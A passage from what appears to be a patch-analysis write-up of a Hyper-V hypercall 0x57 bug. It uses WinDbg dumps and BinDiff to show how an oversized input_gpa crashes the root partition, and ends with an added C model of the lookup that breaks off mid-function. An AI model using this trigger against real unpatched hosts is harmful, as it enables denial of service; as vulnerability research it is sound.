<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">kd> !dd 0 – in guest OS</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"># 0 f000eef3 f000eef3 f000e2c3 f000eef3</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"># 10 f000eef3 f000ff54 f00000bf f0000067</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"># 20 f000fea5 f000e987 f000eef3 f000eef3</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"># 30 f000eef3 f000eef3 f000ef57 f000ff53</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"># 40 c8001148 f000f84d f000f841 f0001558</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"># 50 f000e739 f000f859 f000e82e f000860e</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"># 60 f000e000 f000e6f2 f000fe6e f000ff53</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"># 70 f000ff53 f000f0a4 f000efc7 c0002ff5</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>dc ffffc80000000000 – first table entries in hypervisor address space</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffc800`00000000 </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">20600077</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">80000000</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> 20601077 80000000 w.` ....w.` ....</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffc800`00000010 20602077 80000000 20603077 80000000 w ` ....w0` ....</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffc800`00000020 02902075 82000000 20605077 80000000 u ......wP` ....</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>!dd 8000000020600000 </span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">#8000000020600000 f000eef3 f000eef3 f000e2c3 f000eef3</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">#8000000020600010 f000eef3 f000ff54 f00000bf f0000067</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">#8000000020600020 f000fea5 f000e987 f000eef3 f000eef3</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">#8000000020600030 f000eef3 f000eef3 f000ef57 f000ff53</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">#8000000020600040 c8001148 f000f84d f000f841 f0001558</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">#8000000020600050 f000e739 f000f859 f000e82e f000860e</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">#8000000020600060 f000e000 f000e6f2 f000fe6e f000ff53</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">#8000000020600070 f000ff53 f000f0a4 f000efc7 c0002ff5</span></div>
<br /><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">kd> !dc 0x20000000-60 L18 – last guest OS physical page (512 MB RAM)</span></div>
<br /><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">#1fffffa0 00000000 00000000 00000000 00000000 ................</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">#1fffffb0 00000000 00000000 00000000 00000000 ................</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">#1fffffc0 00000000 00000000 00000000 00000000 ................</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">#1fffffd0 00000000 00000000 00000000 00000000 ................</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">#1fffffe0 5446534d 32304d56 00000000 00000000 MSFTVM02........</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">#1ffffff0 00ff48ea 2f3530f0 312f3332 00fc0032 .H...05/23/12...</span></div>
<br /><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>dd ffffc80000000000+(0x20000-1)*8 – last table element in the hypervisor (points to the last physical page of the guest OS).</span></div>
<br /><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffc800`000ffff8 405ff077 80000000 00000000 00000000</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span></div>
<br /><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>!dc 80000000405ff000+0xFD0 - hypervisor</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">#80000000405fffd0 00000000 00000000 00000000 00000000 ................</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">#80000000405fffe0 5446534d 32304d56 00000000 00000000 MSFTVM02........</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">#80000000405ffff0 00ff48ea 2f3530f0 312f3332 00fc0032 .H...05/23/12...</span></div>
<br /><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">We can see that the address 0xffffc80000000000 does not change after a reboot (like many addresses of hypervisor structures; in general, Hyper-V has poor address space randomization).</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Let's see in detail what happens when hypercall 0x57 is called with </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">input_gpa</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> = 200000000000h.</span></div>
<br /><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Test r15, r15 returns false:</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="119" src="https://lh4.googleusercontent.com/rtm0bEsxHxgOu0ZTVYITFC3jmnZKUwRsaKh5gmi9CSTT6m7915lFMfQfAMhzeOdgblFOboz2qZYsxqR3SBOLNB0kx1DnK-rp9J-sW2P_15BUbfX9JzCr0OrZDw22nFiG_nwpAgnjztZJs4CmdQ" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="624" /></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">We get to this code (r11b has been zeroed, and </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">input_gpa</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> is in rsi):</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="172" src="https://lh4.googleusercontent.com/PK7szWW1A0tKfMP-C2vOki3IbinVxqoLU7KTygqjL7UDuQ5JQPrWOcNkHInormx8CyvQU8w_ntab6XiuCkU7WTJCvYhCqCCP06xoBF-6H-FOeIN3DMcdY_7m9cKyFtpsPMqLfjhKHp1wDHCAuA" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="298" /></span></div>
<br /><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">R10 contains a pointer to some structure (we will call it struct1):</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>dd @r10</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00000080`b5859000 0000001b 00000003 00000001 00000000</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00000080`b5859010 00000000 00000000 00000000 00002000</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00000080`b5859020 00000000 00000000 00000000 00000000</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00000080`b5859030 b585b000 00000080 00000000 00000000</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00000080`b5859040 00000000 00000000 b5802000 00000080</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00000080`b5859050 00000000 00000000 87000fe7 00000001</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00000080`b5859060 00000000 00000000 00000000 00000000</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00000080`b5859070 00000002 00000100 00000000 00000000</span></div>
<br /><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The hypercall is not invoked (ebx equals 1007h before the jnz instruction):</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="206" src="https://lh6.googleusercontent.com/nDXP3YM9vojBgcpHGDimZ6IbLOnnpdHU9VWPEmu_CT67YzCwnykKmqcDVm1F4Jwzt7Qm8ohKg4HiZP9rI-NN3lq4aaFM1Mli5ueZaZ1qxQKQR3iiIhpEeECVNNzMtcwS65UHf-R3-uI9oSW4TA" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="505" /></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">After mHandle64bVMCallMemory has finished and we have returned to mParse_VMEXIT:</span></div>
<br /><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="141" src="https://lh5.googleusercontent.com/xk74zGNdRGIJwCA7X3TC8-eX5WT1SNvqrskvfsc_HJ_fD9h5WZ0LaP_QpuaQ16ZiPHDjz6cpRWAgNuDImWABp5UzZS37zMpEaq9-IY9NVD9gtzNeA9T8YEBU-JXyJfSPfuUZIi1Ut0ItUfHCuQ" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="515" /></span></div>
<br /><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Then we go to mBSOD_L3,</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="82" src="https://lh5.googleusercontent.com/omQjBltO0B2DTV_LtssJXksDVi2CRIT4WA3dZYcHKbbUql48gJL7yfQ4Bju8gY4H5QyBSwT8R4TZJeL_rMz9QwH_lQ63fqtbWBhP_1u8YEjaGQSbGz5Zg6zHOSFy-YfV2QdW1lylNhwfzgUMRw" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="252" /></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">which analyses the result of mHandle64bVMCallMemory:</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="148" src="https://lh6.googleusercontent.com/Uii2Xa20I0zYAx6TI6FS-22Irb7TF6i6SScUJaVgXOHpraQ09fjk2O8U6bwOy2INmOTf7Og3LjKqoo6XyYPo3rPMxIHkj-spoA3o7xOAsonCQEA52nNUKhpBDDr4brjG_Mds3lchpVa5hf_k0A" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="431" /></span></div>
<br /><div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">If edx = 1b, we go to mBSOD_L2,</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="153" src="https://lh6.googleusercontent.com/z2fgpO8HuelNWdQP87Wqi9hPINJ0hwXuaEp4wNuL6yRXhAZI9Ifcp68CUhMf6bMdtQrfV0QOnaIrAx5QFzOpPklyJTB8x5-Fa92e3pd1THP-WI0UwQWtYy8uoeJQppf4IsH-fIdDMLrSJZFRPA" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="395" /></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">which checks some values in struct1:</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="279" src="https://lh6.googleusercontent.com/rBPA26mGnlTHrk1SCe4OuVgVYrUfj13NHNRIYMY35pk1YATMOIeegR_kAAkgtk1ipwwtqnaFSbKdf0HU-RUvcm3X6iUPIAzoKI_ZfOTwm18ZdQtXYhVNI0CxcwunA3Fp6CH9FAqytYgI4fSCSg" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="526" /></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">I don’t see whether the data at offset 110 was changed between mHandle64bVMCallMemory and mBSOD_L1.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Look at mBSOD_L1 in BinDiff (patched hypervisor on the left): we see that a check on the 40-bit length (and above) was added.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="179" src="https://lh3.googleusercontent.com/fPxBvCmU5I7Gt8sFTop1NikrVa-Bh9jPg9zyjsP7yK1C23a0p5VxxY6vSQaT_V9K1Yqf-Yr5E93C-Irdi0GRucn1Nj2zlHqruUCntlPGMFXUX9C-2eFk22OeInINkHLv_v1NgOXRlEjVCwes9w" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="624" /></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Next, mBSOD_Handle64VmcallMemory is called, where the SPA table element that corresponds to the GPA is loaded. The index is (input_gpa shr 12)*8. If that memory is not loaded, we get exception 0xC0000005, which causes a BSOD in the root partition.</span></div>
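<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The table lookup described above, modelled as an added C example; this is not code from the article and not Hyper-V code. The table layout (one 8-byte entry per 4 KiB guest page, with the low 12 bits of an entry treated as flags), the exact 40-bit GPA limit and all function names are assumptions made for illustration. The sample values come from the dumps above: a 512 MB guest has 0x20000 entries, and its last entry reads 80000000`405ff077.</span></div>

```c
#include <stdint.h>
#include <stddef.h>
#include <stdbool.h>
#include <stdio.h>

/* Added model of the GPA -> SPA table lookup; not Hyper-V's code.
 * Layout, limit and names below are assumptions for illustration. */
#define PAGE_SHIFT      12
#define GPA_WIDTH_BITS  40                 /* assumed: width the patched check enforces */
#define ENTRY_FLAG_MASK 0xFFFULL           /* assumed: low 12 bits of an entry are flags */

enum lookup_status { LOOKUP_OK = 0, LOOKUP_GPA_TOO_WIDE = 1, LOOKUP_OUT_OF_RANGE = 2 };

/* Byte offset of the table entry for a GPA: (gpa >> 12) * 8, as stated in the article. */
uint64_t gpa_table_offset(uint64_t gpa)
{
    return (gpa >> PAGE_SHIFT) * sizeof(uint64_t);
}

/* Models the unchecked pre-patch lookup: true when the entry for gpa lies past
 * the end of a table with n_entries entries, i.e. where the hypervisor would
 * touch unmapped memory and raise the 0xC0000005 exception seen above. */
bool unchecked_lookup_overruns(uint64_t n_entries, uint64_t gpa)
{
    return gpa_table_offset(gpa) >= n_entries * sizeof(uint64_t);
}

/* Hardened lookup: reject GPAs wider than GPA_WIDTH_BITS (the check the article
 * sees added in the patched mBSOD_L1) and anything outside the table, before
 * any table memory is read. */
enum lookup_status checked_lookup(const uint64_t *table, uint64_t n_entries,
                                  uint64_t gpa, uint64_t *spa_out)
{
    if (gpa >> GPA_WIDTH_BITS)
        return LOOKUP_GPA_TOO_WIDE;
    uint64_t idx = gpa >> PAGE_SHIFT;
    if (idx >= n_entries)
        return LOOKUP_OUT_OF_RANGE;
    /* Page frame comes from the entry, page offset from the GPA. */
    *spa_out = (table[idx] & ~ENTRY_FLAG_MASK) | (gpa & ((1ULL << PAGE_SHIFT) - 1));
    return LOOKUP_OK;
}

/* Constructed 512 MB guest table: 0x20000 entries, with only the last entry
 * populated with the value read from the hypervisor table in the article. */
#define GUEST_PAGES 0x20000ULL
static uint64_t g_table[GUEST_PAGES];

void init_sample_table(void)
{
    g_table[GUEST_PAGES - 1] = 0x80000000405ff077ULL;
}

int main(void)
{
    init_sample_table();
    uint64_t spa = 0;

    printf("offset of last entry: 0x%llx\n",
           (unsigned long long)gpa_table_offset(0x1ffff000ULL));

    enum lookup_status st = checked_lookup(g_table, GUEST_PAGES, 0x1fffffe0ULL, &spa);
    printf("GPA 0x1fffffe0 -> status %d, SPA 0x%llx\n", (int)st, (unsigned long long)spa);

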